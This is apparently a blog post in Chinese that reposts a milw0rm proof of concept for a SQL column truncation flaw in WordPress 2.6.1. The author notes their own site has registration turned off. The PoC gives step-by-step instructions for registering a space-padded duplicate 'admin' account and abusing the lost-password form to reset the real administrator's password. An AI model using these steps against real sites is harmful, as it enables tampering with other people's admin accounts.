用wordpress的要注意了，不过拿我这里测试就没效果了，我从一开始就是关闭用户注册的。# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http:///wp-login.php?action=register2. register as:login: admin x
email: your email^ admin[55 space chars]xnow, we have duplicated 'admin' account in database3. go to url: server.com/wp-login.php?action=lostpassword4. write your email into field and submit this form5. check your email and go to reset confirmation link6. admin's password changed, but new password will be send to correct admin email ;/# milw0rm.com